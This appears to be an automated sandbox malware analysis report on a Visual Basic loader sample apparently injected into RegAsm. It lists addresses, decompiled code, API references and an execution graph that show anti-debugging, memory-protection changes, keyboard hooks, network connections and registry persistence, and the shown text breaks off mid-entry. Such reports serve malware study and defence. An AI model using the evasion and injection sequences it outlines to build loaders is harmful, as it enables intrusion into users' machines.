                                  0x0040192e
                                  0x00401930
                                  0x00401932
                                  0x00401934
                                  0x00401936
                                  0x00401938
                                  0x0040193a
                                  0x0040193c
                                  0x0040193e
                                  0x00401942
                                  0x00401943
                                  0x00401945
                                  0x00401947
                                  0x00401949
                                  0x0040194b
                                  0x0040194d
                                  0x0040194f
                                  0x00401951
                                  0x00401953
                                  0x00401955
                                  0x0040195a
                                  0x0040195c
                                  0x0040195e
                                  0x00401960
                                  0x00401966
                                  0x00401967
                                  0x00401969
                                  0x0040196b
                                  0x0040196b
                                  0x0040196d
                                  0x0040196f
                                  0x00401971
                                  0x00401973
                                  0x00401975
                                  0x00401977
                                  0x00401979
                                  0x0040197b
                                  0x0040197d
                                  0x00401980
                                  0x00401982
                                  0x00401984
                                  0x00401986
                                  0x00401987
                                  0x00401989
                                  0x0040198b
                                  0x0040198d
                                  0x00401990
                                  0x00401992
                                  0x00401994
                                  0x00401998
                                  0x0040199a
                                  0x0040199c
                                  0x0040199e
                                  0x0040199f
                                  0x004019a5
                                  0x004019a8
                                  0x004019aa
                                  0x004019ac
                                  0x004019b1
                                  0x004019b4
                                  0x004019b6
                                  0x004019b7
                                  0x004019b9
                                  0x004019bb
                                  0x004019bb
                                  0x004019bb
                                  0x004019be
                                  0x004019c0
                                  0x004019c2
                                  0x004019c3
                                  0x004019ca
                                  0x004019ce
                                  0x004019d1
                                  0x004019d2
                                  0x004019d3
                                  0x004019d5
                                  0x004019d7
                                  0x004019d9
                                  0x004019db
                                  0x004019dd
                                  0x004019df
                                  0x004019df
                                  0x004019df
                                  0x004019df
                                  0x004019e1
                                  0x004019e5
                                  0x004019e7
                                  0x004019e7
                                  0x004019e7
                                  0x004019e8
                                  0x004019e9
                                  0x004019ea
                                  0x004019eb
                                  0x004019eb
                                  0x004019eb
                                  0x004019f0
                                  0x004019f1
                                  0x004019f3
                                  0x004019f5
                                  0x004019f7
                                  0x004019fe
                                  0x00401a00
                                  0x00401a02
                                  0x00401a04
                                  0x00401a06
                                  0x00401a08
                                  0x00401a09
                                  0x00401a0f
                                  0x00401a12
                                  0x00401a13
                                  0x00401a15
                                  0x00401a17
                                  0x00401a1a
                                  0x00401a1c
                                  0x00401a1e
                                  0x00401a22
                                  0x00401a23
                                  0x00401a26
                                  0x00401a28
                                  0x00401a2a
                                  0x00401a2c
                                  0x00401a2e
                                  0x00401a30
                                  0x00401a31
                                  0x00401a34
                                  0x00401a37
                                  0x00401a3a
                                  0x00401a3b
                                  0x00401a40
                                  0x00401a41
                                  0x00401a43
                                  0x00401a46
                                  0x00401a48
                                  0x00401a49
                                  0x00401a4c
                                  0x00401a4e
                                  0x00401a50
                                  0x00401a52
                                  0x00401a54
                                  0x00401a56
                                  0x00401a58
                                  0x00401a5a
                                  0x00401a5b
                                  0x00401a5b
                                  0x00401a5b
                                  0x00401a5e
                                  0x00401a61
                                  0x00401a64
                                  0x00401a66
                                  0x00401a68
                                  0x00401a69
                                  0x00401a6b
                                  0x00401a6f
                                  0x00401a76
                                  0x00401a78
                                  0x00401a7a
                                  0x00401a7c
                                  0x00401a7e
                                  0x00401a87
                                  0x00401a8b
                                  0x00401a8d
                                  0x00401a8f
                                  0x00401a91
                                  0x00401a93
                                  0x00401a95
                                  0x00401a99
                                  0x00401a9c
                                  0x00401a9d
                                  0x00401aa0
                                  0x00401aa3
                                  0x00401aa9
                                  0x00401aac
                                  0x00401aae
                                  0x00401ab0
                                  0x00401ab2
                                  0x00401ab4
                                  0x00401ab6
                                  0x00401ab8
                                  0x00401aba
                                  0x00401abc
                                  0x00401abe
                                  0x00401ac0
                                  0x00401ac2
                                  0x00401ac4
                                  0x00401ac6
                                  0x00401ac8
                                  0x00401aca
                                  0x00401acc
                                  0x00401ace
                                  0x00401ad0
                                  0x00401ad2
                                  0x00401ad4
                                  0x00401ad6
                                  0x00401ad8
                                  0x00401ada
                                  0x00401adc
                                  0x00401ade
                                  0x00401ae0
                                  0x00401ae2
                                  0x00401ae4
                                  0x00401ae6
                                  0x00401ae8
                                  0x00401aea
                                  0x00401aec

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24036576698.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.24036522568.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000003.00000002.24036687091.0000000000411000.00000004.00020000.sdmp
                                  • Associated: 00000003.00000002.24036753540.0000000000413000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID: #100
                                  • String ID: VB5!6&*
                                  • API String ID: 1341478452-3593831657
                                  • Opcode ID: 4d8cb2d3f81444f5cb99dfa7fd9710e90a9e34f4963007c297919c59f9fe458b
                                  • Instruction ID: aa754eb57dd15ec0aef5cc63c44c39ddb5d135e13c13bfd1b46676cc5d04ed35
                                  • Opcode Fuzzy Hash: 4d8cb2d3f81444f5cb99dfa7fd9710e90a9e34f4963007c297919c59f9fe458b
                                  • Instruction Fuzzy Hash: A2D0A49588E3C22ED3072275082245A3F31095B6A239E41EBD0A0EE8F3E1AC4959C32A
                                  Uniqueness

                                  Uniqueness Score: 1.25%

                                  Non-executed Functions

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24038739824.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_2240000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2768ccaee01506907b3031a94b546294cf9f301d5795d432e8b2cfca0e0beeb0
                                  • Instruction ID: 5dcbdfc15b004cc4b8d83867f7d6d9e8136785e8e9c782f0ed5111fce50e8153
                                  • Opcode Fuzzy Hash: 2768ccaee01506907b3031a94b546294cf9f301d5795d432e8b2cfca0e0beeb0
                                  • Instruction Fuzzy Hash: 812166725246939FDB278678C8467D0BFE0EB063147195A89C6818F183D31A515BCF82
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24038739824.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_2240000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3dd1c2e588d1a0c4da992bc5ea56af7046ebaaca36f0d30ddd6c4c4f6cbeac3
                                  • Instruction ID: 7723c52281215d0d31817466ecdde85184003831dd462841636116c420a210c9
                                  • Opcode Fuzzy Hash: a3dd1c2e588d1a0c4da992bc5ea56af7046ebaaca36f0d30ddd6c4c4f6cbeac3
                                  • Instruction Fuzzy Hash: A30178725643938FC7335778C452AC0BBB4EB163187149A98C8D68F193C3181053CF92
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed

                                  Basic blocks of the function at 4107ae (node numbers as in the report's graph):
                                  • Node 23: 4107ae-4107e2, calls __vbaChkstk; edges to 24 and 25
                                  • Node 24: 4107e4-4107fa, calls __vbaNew2; edge to 26
                                  • Node 25: 4107fc; edge to 26
                                  • Node 26: 410803-410824; edges to 28 and 29
                                  • Node 28: 410840; edge to 30
                                  • Node 29: 410826-41083e, calls __vbaHresultCheckObj; edge to 30
                                  • Node 30: 410844-410858, calls 402673 and __vbaFreeStr
                                  C-Code - Quality: 47%
                                  			E004107AE(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				void* _v40;
                                  				intOrPtr* _v44;
                                  				signed int _v48;
                                  				intOrPtr* _v56;
                                  				signed int _v60;
                                  				signed int _t24;
                                  				void* _t25;
                                  				void* _t29;
                                  				intOrPtr _t34;
                                  				void* _t37;
                                  
                                  				_t31 = __esi;
                                  				_t30 = __edi;
                                  				_t27 = __ecx;
                                  				_t26 = __ebx;
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_push(0x4010c6);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t34;
                                  				_push(0x28);
                                  				L004010C0();
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_v12 = _t34;
                                  				_v8 = 0x4010a8;
                                  				if( *0x411010 != 0) {
                                  					_v56 = 0x411010;
                                  				} else {
                                  					_push(0x411010);
                                  					_push(0x401948);
                                  					L00401174();
                                  					_v56 = 0x411010;
                                  				}
                                  				_v44 =  *_v56;
                                  				_t24 =  *((intOrPtr*)( *_v44 + 0x1bc))(_v44, 0);
                                  				asm("fclex");
                                  				_v48 = _t24;
                                  				if(_v48 >= 0) {
                                  					_v60 = _v60 & 0x00000000;
                                  				} else {
                                  					_push(0x1bc);
                                  					_push(0x401f54);
                                  					_push(_v44);
                                  					_push(_v48);
                                  					L0040116E();
                                  					_v60 = _t24;
                                  				}
                                  				_t25 = L00402673(_t24, _t26, _t27, _t29, _t30, _t31, _t37);
                                  				_push(E00410859);
                                  				L00401150();
                                  				return _t25;
                                  			}

                                  APIs
                                  • __vbaChkstk.MSVBVM60(00000000,004010C6,?,?,?,00410757,00000000,?,?,?,004010C6), ref: 004107C9
                                  • __vbaNew2.MSVBVM60(00401948,00411010,?,?,?,00000000,004010C6,?,?,?,00410757), ref: 004107EE
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401F54,000001BC), ref: 00410836
                                  • __vbaFreeStr.MSVBVM60(00410859), ref: 00410853
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24036576698.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.24036522568.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000003.00000002.24036687091.0000000000411000.00000004.00020000.sdmp
                                  • Associated: 00000003.00000002.24036753540.0000000000413000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID: __vba$CheckChkstkFreeHresultNew2
                                  • String ID:
                                  • API String ID: 4127847336-0
                                  • Opcode ID: 9b3847193618ab2bc30815ff975c85f412867dc867ad22866b2cd7a15ab5917b
                                  • Instruction ID: 058696c4c43b0ce3c50059c63063b7da128e561d0ec1160893236ba59c8f909c
                                  • Opcode Fuzzy Hash: 9b3847193618ab2bc30815ff975c85f412867dc867ad22866b2cd7a15ab5917b
                                  • Instruction Fuzzy Hash: CC114870E41248AFDB10EF95C846BDDBBB4EB08754F20442AF100766A0C3BD58C49B68
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Execution Graph

                                  Execution Coverage: 9.7%
                                  Dynamic/Decrypted Code Coverage: 18.4%
                                  Signature Coverage: 50.6%
                                  Total number of Nodes: 707
                                  Total number of Limit Nodes: 8

                                  Graph

                                  (Execution graph rendered as an image in the original report; the serialized node and edge listing is not reproduced here.)
12073->12074 12075 f01dea WriteFile 12073->12075 12074->11909 12075->12074 12076 f01e1f 12075->12076 12077 f09eee 24 API calls 12076->12077 12078 f01e2b 12077->12078 12079 f01e59 12078->12079 12080 f09eee 24 API calls 12078->12080 12079->11909 12080->12079 12082 f01d53 12081->12082 12083 f01d5a 25 API calls 12082->12083 12084 f0690f 12083->12084 12085 f0186b GetLongPathNameW 12084->12085 12086 f06918 12085->12086 12086->11918 12090 f01217 12087->12090 12118 f0062c 12090->12118 12129 f01100 12090->12129 12192 f093ed 12090->12192 12203 f01e6c 12090->12203 12219 f016be 12090->12219 12092 f09eee 24 API calls 12094 f04107 12092->12094 12093 f04c36 2 API calls 12093->12118 12094->11925 12095 f081cf 2 API calls 12096 f00aae NtSetInformationThread 12095->12096 12097 f081cf 2 API calls 12096->12097 12097->12118 12098 f03189 12100 f09eee 24 API calls 12098->12100 12101 f0452b 12098->12101 12099 f04109 GetPEB 12099->12118 12108 f03601 12100->12108 12101->11925 12102 f03df6 12103 f03e07 12102->12103 12104 f09eee 24 API calls 12102->12104 12105 f09eee 24 API calls 12103->12105 12104->12103 12107 f03e15 12105->12107 12106 f09eee 24 API calls 12106->12118 12109 f09eee 24 API calls 12107->12109 12108->12102 12112 f09eee 24 API calls 12108->12112 12110 f03e2d 12109->12110 12114 f09eee 24 API calls 12110->12114 12111 f081cf LoadLibraryA GetPEB 12111->12118 12113 f03723 12112->12113 12113->12102 12116 f09eee 24 API calls 12113->12116 12115 f03e44 12114->12115 12115->11925 12117 f03761 12116->12117 12117->12102 12119 f09eee 24 API calls 12117->12119 12118->12093 12118->12095 12118->12098 12118->12099 12118->12106 12118->12111 12120 f08a84 12118->12120 12121 f07ce8 GetPEB 12118->12121 12123 f010ea 12118->12123 12126 f011bf 12118->12126 12127 f01864 GetLongPathNameW 12118->12127 12136 f017bf 24 API calls 12118->12136 12139 f0949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 12118->12139 12140 f01719 24 API calls 12118->12140 12141 f01dbc 24 API calls 12118->12141 12137 f037c7 
12119->12137 12122 f08799 GetPEB 12120->12122 12121->12118 12124 f08aa5 12122->12124 12125 f03189 24 API calls 12123->12125 12123->12129 12124->11925 12125->12123 12128 f011de 12126->12128 12130 f011d1 12126->12130 12133 f01864 GetLongPathNameW 12126->12133 12127->12118 12128->12129 12131 f05a43 12128->12131 12129->12092 12130->12128 12134 f01d3f 24 API calls 12130->12134 12132 f011f0 24 API calls 12131->12132 12135 f05a48 12132->12135 12133->12130 12134->12128 12138 f052b9 24 API calls 12135->12138 12143 f05a58 12135->12143 12136->12118 12137->12102 12142 f09eee 24 API calls 12137->12142 12138->12143 12139->12118 12140->12118 12141->12118 12144 f03952 12142->12144 12144->12102 12145 f09eee 24 API calls 12144->12145 12146 f03d94 12145->12146 12146->12102 12147 f03d9b 12146->12147 12148 f09eee 24 API calls 12147->12148 12149 f03db6 12148->12149 12150 f09eee 24 API calls 12149->12150 12151 f03dce 12150->12151 12151->11925 12153 f052d9 12152->12153 12154 f057fa 12152->12154 12155 f09eee 23 API calls 12153->12155 12156 f09eee 23 API calls 12154->12156 12157 f05306 12155->12157 12158 f0580a 12156->12158 12157->12154 12159 f05310 InternetOpenUrlA 12157->12159 12158->11934 12159->12154 12161 f0533c 12159->12161 12160 f09eee 23 API calls 12160->12161 12161->12154 12161->12160 12162 f057b6 12161->12162 12163 f09eee 23 API calls 12162->12163 12164 f057ce 12163->12164 12165 f09eee 23 API calls 12164->12165 12166 f057e1 12165->12166 12166->11934 12167->11960 12169 f0694e 12168->12169 12172 f0187b 12169->12172 12171 f06953 12171->11993 12173 f01898 12172->12173 12176 f07c33 GetLongPathNameW 12173->12176 12175 f018b8 12175->12171 12176->12175 12178 f01818 12177->12178 12191 f01820 RegSetValueExA 12178->12191 12180 f068c2 12181 f017ce 24 API calls 12180->12181 12182 f06918 12180->12182 12183 f068d8 12181->12183 12182->11997 12183->12182 12184 f01d5a 24 API calls 12183->12184 12185 f0690f 12184->12185 12186 f0186b GetLongPathNameW 12185->12186 12186->12182 12188 f01d68 
12187->12188 12189 f01dbc 25 API calls 12188->12189 12190 f01db9 12189->12190 12190->12001 12191->12180 12193 f081cf 12192->12193 12200 f09402 12192->12200 12194 f0822b LoadLibraryA 12193->12194 12195 f08799 GetPEB 12193->12195 12196 f08235 12194->12196 12197 f081ed 12195->12197 12196->12090 12198 f08219 12197->12198 12199 f08799 GetPEB 12197->12199 12198->12194 12201 f08204 12199->12201 12200->12090 12201->12198 12202 f08799 GetPEB 12201->12202 12202->12198 12204 f081cf 2 API calls 12203->12204 12205 f01e7e 12204->12205 12206 f09eee 24 API calls 12205->12206 12216 f023c9 12205->12216 12206->12205 12208 f02967 GetPEB 12211 f0298e 12208->12211 12209 f02a5f 12210 f02a71 12209->12210 12286 f02f84 12209->12286 12213 f0a810 12210->12213 12214 f02a91 24 API calls 12210->12214 12211->12209 12215 f09eee 24 API calls 12211->12215 12217 f02a2c 12211->12217 12214->12213 12215->12211 12281 f0302c 12216->12281 12218 f09eee 24 API calls 12217->12218 12218->12209 12221 f0062c 12219->12221 12220 f01706 12220->12090 12221->12090 12221->12220 12222 f04c36 2 API calls 12221->12222 12223 f081cf 2 API calls 12221->12223 12226 f03189 12221->12226 12227 f04109 GetPEB 12221->12227 12233 f081cf LoadLibraryA GetPEB 12221->12233 12235 f09eee 24 API calls 12221->12235 12247 f08a84 12221->12247 12248 f07ce8 GetPEB 12221->12248 12252 f011bf 12221->12252 12253 f01864 GetLongPathNameW 12221->12253 12254 f010ea 12221->12254 12264 f017bf 24 API calls 12221->12264 12268 f0949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 12221->12268 12269 f01719 24 API calls 12221->12269 12270 f01dbc 24 API calls 12221->12270 12222->12221 12224 f00aae NtSetInformationThread 12223->12224 12225 f081cf 2 API calls 12224->12225 12225->12221 12228 f09eee 24 API calls 12226->12228 12229 f0452b 12226->12229 12227->12221 12237 f03601 12228->12237 12229->12090 12230 f03df6 12231 f03e07 12230->12231 12232 f09eee 24 API calls 12230->12232 12234 f09eee 24 API calls 12231->12234 12232->12231 12233->12221 12236 f03e15 
12234->12236 12235->12221 12238 f09eee 24 API calls 12236->12238 12237->12230 12240 f09eee 24 API calls 12237->12240 12239 f03e2d 12238->12239 12242 f09eee 24 API calls 12239->12242 12241 f03723 12240->12241 12241->12230 12244 f09eee 24 API calls 12241->12244 12243 f03e44 12242->12243 12243->12090 12245 f03761 12244->12245 12245->12230 12246 f09eee 24 API calls 12245->12246 12267 f037c7 12246->12267 12249 f08799 GetPEB 12247->12249 12248->12221 12250 f08aa5 12249->12250 12250->12090 12251 f03189 24 API calls 12251->12254 12255 f011de 12252->12255 12257 f011d1 12252->12257 12260 f01864 GetLongPathNameW 12252->12260 12253->12221 12254->12251 12256 f01100 12254->12256 12255->12256 12258 f05a43 12255->12258 12263 f09eee 24 API calls 12256->12263 12257->12255 12261 f01d3f 24 API calls 12257->12261 12259 f011f0 24 API calls 12258->12259 12262 f05a48 12259->12262 12260->12257 12261->12255 12266 f052b9 24 API calls 12262->12266 12272 f05a58 12262->12272 12265 f04107 12263->12265 12264->12221 12265->12090 12266->12272 12267->12230 12271 f09eee 24 API calls 12267->12271 12268->12221 12269->12221 12270->12221 12273 f03952 12271->12273 12273->12230 12274 f09eee 24 API calls 12273->12274 12275 f03d94 12274->12275 12275->12230 12276 f03d9b 12275->12276 12277 f09eee 24 API calls 12276->12277 12278 f03db6 12277->12278 12279 f09eee 24 API calls 12278->12279 12280 f03dce 12279->12280 12280->12090 12282 f0060e 12281->12282 12283 f030a5 12281->12283 12282->12283 12290 f005e5 EnumWindows 12282->12290 12283->12208 12285 f00613 12285->12208 12287 f02f89 12286->12287 12375 f02f8e 12287->12375 12289 f04cf9 12289->12210 12291 f005ff 12290->12291 12320 f0062c 12290->12320 12292 f005e5 23 API calls 12291->12292 12293 f00613 12292->12293 12293->12285 12295 f04c36 2 API calls 12295->12320 12296 f081cf 2 API calls 12297 f00aae NtSetInformationThread 12296->12297 12298 f081cf 2 API calls 12297->12298 12298->12320 12299 f03189 12301 f09eee 23 API calls 12299->12301 12302 f0452b 12299->12302 12300 
f04109 GetPEB 12300->12320 12308 f03601 12301->12308 12302->12285 12303 f03df6 12304 f03e07 12303->12304 12305 f09eee 23 API calls 12303->12305 12306 f09eee 23 API calls 12304->12306 12305->12304 12307 f03e15 12306->12307 12309 f09eee 23 API calls 12307->12309 12308->12303 12311 f09eee 23 API calls 12308->12311 12310 f03e2d 12309->12310 12313 f09eee 23 API calls 12310->12313 12312 f03723 12311->12312 12312->12303 12315 f09eee 23 API calls 12312->12315 12314 f03e44 12313->12314 12314->12285 12316 f03761 12315->12316 12316->12303 12318 f09eee 23 API calls 12316->12318 12317 f081cf LoadLibraryA GetPEB 12317->12320 12340 f037c7 12318->12340 12319 f09eee 23 API calls 12319->12320 12320->12295 12320->12296 12320->12299 12320->12300 12320->12317 12320->12319 12321 f08a84 12320->12321 12322 f07ce8 GetPEB 12320->12322 12324 f010ea 12320->12324 12327 f011bf 12320->12327 12328 f01864 GetLongPathNameW 12320->12328 12338 f017bf 23 API calls 12320->12338 12344 f0114f 12320->12344 12356 f0949d 12320->12356 12323 f08799 GetPEB 12321->12323 12322->12320 12325 f08aa5 12323->12325 12326 f03189 23 API calls 12324->12326 12330 f01100 12324->12330 12325->12285 12326->12324 12329 f011de 12327->12329 12331 f011d1 12327->12331 12334 f01864 GetLongPathNameW 12327->12334 12328->12320 12329->12330 12332 f05a43 12329->12332 12337 f09eee 23 API calls 12330->12337 12331->12329 12335 f01d3f 23 API calls 12331->12335 12333 f011f0 23 API calls 12332->12333 12336 f05a48 12333->12336 12334->12331 12335->12329 12341 f052b9 23 API calls 12336->12341 12347 f05a58 12336->12347 12339 f04107 12337->12339 12338->12320 12339->12285 12340->12303 12346 f09eee 23 API calls 12340->12346 12341->12347 12342 f0949d 4 API calls 12342->12344 12343 f01719 23 API calls 12343->12344 12344->12320 12344->12342 12344->12343 12345 f01dbc 23 API calls 12344->12345 12345->12344 12348 f03952 12346->12348 12348->12303 12349 f09eee 23 API calls 12348->12349 12350 f03d94 12349->12350 12350->12303 12351 f03d9b 12350->12351 12352 
f09eee 23 API calls 12351->12352 12353 f03db6 12352->12353 12354 f09eee 23 API calls 12353->12354 12355 f03dce 12354->12355 12355->12285 12357 f081cf 2 API calls 12356->12357 12358 f094aa 12357->12358 12359 f081cf 2 API calls 12358->12359 12360 f094c3 GetPEB 12359->12360 12371 f09b4c NtProtectVirtualMemory 12360->12371 12362 f09515 12363 f09a53 12362->12363 12372 f09b4c NtProtectVirtualMemory 12362->12372 12363->12320 12366 f09ade 12363->12366 12367 f09a84 12363->12367 12365 f09b44 12365->12320 12374 f09b4c NtProtectVirtualMemory 12366->12374 12373 f09b4c NtProtectVirtualMemory 12367->12373 12369 f09adb 12369->12320 12371->12362 12372->12363 12373->12369 12374->12365 12376 f02f9b 12375->12376 12378 f02f89 12376->12378 12379 f0060e 12376->12379 12377 f02f8e 25 API calls 12382 f04cf9 12377->12382 12378->12289 12378->12377 12380 f005e5 25 API calls 12379->12380 12381 f00613 12380->12381 12381->12289 12382->12289 12383 204f286a 12384 204f28ba FormatMessageW 12383->12384 12385 204f28c2 12384->12385 12386 204f22ea 12387 204f231f WSAConnect 12386->12387 12389 204f233e 12387->12389 12494 204f112a 12495 204f1162 ConvertStringSecurityDescriptorToSecurityDescriptorW 12494->12495 12497 204f11a3 12495->12497 12498 1db1a2d6 12499 1db1a302 SetErrorMode 12498->12499 12500 1db1a32b 12498->12500 12501 1db1a317 12499->12501 12500->12499 12502 1db1b856 12504 1db1b891 LoadLibraryA 12502->12504 12505 1db1b8ce 12504->12505 12390 204f0cfe 12393 204f0d36 WSASocketW 12390->12393 12392 204f0d72 12393->12392 12510 204f1dbe 12511 204f1df9 getaddrinfo 12510->12511 12513 204f1e6b 12511->12513 12514 204f04be 12516 204f04f6 CreateMutexW 12514->12516 12517 204f0539 12516->12517 12518 204f1932 12520 204f1967 GetTokenInformation 12518->12520 12521 204f19a4 12520->12521 12522 f0a30d 12525 f0a70f 12522->12525 12557 f0062c 12522->12557 12523 f0949d 4 API calls 12523->12557 12524 f04c36 2 API calls 12524->12557 12530 f0a7b1 12525->12530 12532 f0a7f4 12525->12532 12525->12557 12526 f081cf 2 API calls 
12527 f00aae NtSetInformationThread 12526->12527 12528 f081cf 2 API calls 12527->12528 12528->12557 12529 f0a7d8 CreateFileW 12529->12530 12530->12529 12530->12530 12530->12532 12531 f03189 12534 f09eee 25 API calls 12531->12534 12535 f0452b 12531->12535 12532->12532 12533 f04109 GetPEB 12533->12557 12541 f03601 12534->12541 12536 f03df6 12537 f03e07 12536->12537 12538 f09eee 25 API calls 12536->12538 12539 f09eee 25 API calls 12537->12539 12538->12537 12540 f03e15 12539->12540 12542 f09eee 25 API calls 12540->12542 12541->12536 12544 f09eee 25 API calls 12541->12544 12543 f03e2d 12542->12543 12546 f09eee 25 API calls 12543->12546 12545 f03723 12544->12545 12545->12536 12548 f09eee 25 API calls 12545->12548 12547 f03e44 12546->12547 12549 f03761 12548->12549 12549->12536 12551 f09eee 25 API calls 12549->12551 12550 f081cf LoadLibraryA GetPEB 12550->12557 12554 f037c7 12551->12554 12552 f09eee 25 API calls 12552->12557 12553 f08a84 12556 f08799 GetPEB 12553->12556 12554->12536 12579 f09eee 25 API calls 12554->12579 12555 f07ce8 GetPEB 12555->12557 12559 f08aa5 12556->12559 12557->12523 12557->12524 12557->12526 12557->12531 12557->12533 12557->12550 12557->12552 12557->12553 12557->12555 12558 f010ea 12557->12558 12561 f011bf 12557->12561 12562 f01864 GetLongPathNameW 12557->12562 12572 f017bf 25 API calls 12557->12572 12577 f0114f 12557->12577 12560 f03189 25 API calls 12558->12560 12564 f01100 12558->12564 12560->12558 12563 f011de 12561->12563 12567 f01864 GetLongPathNameW 12561->12567 12571 f011d1 12561->12571 12562->12557 12563->12564 12565 f05a43 12563->12565 12570 f09eee 25 API calls 12564->12570 12566 f011f0 25 API calls 12565->12566 12569 f05a48 12566->12569 12567->12571 12568 f01d3f 25 API calls 12568->12563 12574 f052b9 25 API calls 12569->12574 12580 f05a58 12569->12580 12573 f04107 12570->12573 12571->12563 12571->12568 12572->12557 12574->12580 12575 f0949d 4 API calls 12575->12577 12576 f01719 25 API calls 12576->12577 12577->12557 12577->12575 
12577->12576 12578 f01dbc 25 API calls 12577->12578 12578->12577 12581 f03952 12579->12581 12581->12536 12582 f09eee 25 API calls 12581->12582 12583 f03d94 12582->12583 12583->12536 12584 f03d9b 12583->12584 12585 f09eee 25 API calls 12584->12585 12586 f03db6 12585->12586 12587 f09eee 25 API calls 12586->12587 12588 f03dce 12587->12588 12397 1fee0150 12398 1fee0188 12397->12398 12400 1fee0326 12398->12400 12403 1fee1648 12398->12403 12399 1fee0468 12400->12399 12408 1fee1850 12400->12408 12404 1fee1685 12403->12404 12405 1fee1724 12404->12405 12413 1db1bed6 12404->12413 12417 1db1bf1a 12404->12417 12405->12400 12409 1fee1856 12408->12409 12410 1fee1bbe 12409->12410 12421 1fee1ccf 12409->12421 12426 1fee1cd8 12409->12426 12410->12399 12415 1db1bee3 DeleteFileW 12413->12415 12416 1db1bf5c 12415->12416 12416->12405 12418 1db1bf40 DeleteFileW 12417->12418 12420 1db1bf5c 12418->12420 12420->12405 12422 1fee1cd8 12421->12422 12423 1fee1d36 12422->12423 12431 204f05ee 12422->12431 12434 204f0588 12422->12434 12423->12409 12427 1fee1d00 12426->12427 12428 1fee1d36 12426->12428 12427->12428 12429 204f05ee SetWindowsHookExW 12427->12429 12430 204f0588 SetWindowsHookExW 12427->12430 12428->12409 12429->12428 12430->12428 12432 204f063e SetWindowsHookExW 12431->12432 12433 204f064c 12432->12433 12433->12423 12435 204f05ee SetWindowsHookExW 12434->12435 12437 204f064c 12435->12437 12437->12423 12438 1db1ae8e 12441 1db1aeb7 SetFileAttributesW 12438->12441 12440 1db1aed3 12441->12440

                                  Executed Functions

                                  Control-flow Graph

                                  APIs
                                  • EnumWindows.USER32(00F00613,?,00000000,00F0643A,00F05F92,?,00F031E6,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 00F005F4
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnumInformationThreadWindows
                                  • String ID: 1.!T$249E$249E$shell32
                                  • API String ID: 1954852945-4191954164
                                  • Opcode ID: ef336fe1ccbfa999da492ee3b533c1c2b5a0f666d657459043e314add5ecdc56
                                  • Instruction ID: 63585eaced13dddedab5cf431a785117f0380d6aeaeed29a62a87e52cae622cf
                                  • Opcode Fuzzy Hash: ef336fe1ccbfa999da492ee3b533c1c2b5a0f666d657459043e314add5ecdc56
                                  • Instruction Fuzzy Hash: F152F393E1E9143BD6A05D29FCE239BA2E65751310BB4D2099E519F78FE7ACF80253C0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: f37ffea9538b30e627322f44a590c35cec46f9b9056e11cc572dd1554f423dad
                                  • Instruction ID: 175aa7b91d0f3a392c5fab84139d926a31f1eda7c46d742b1964759715f87559
                                  • Opcode Fuzzy Hash: f37ffea9538b30e627322f44a590c35cec46f9b9056e11cc572dd1554f423dad
                                  • Instruction Fuzzy Hash: BA023571B40309AFEF305E64CC96BDA3767AF46750F644128FE849B1C1CBB99889BB10
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00F081CF: LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
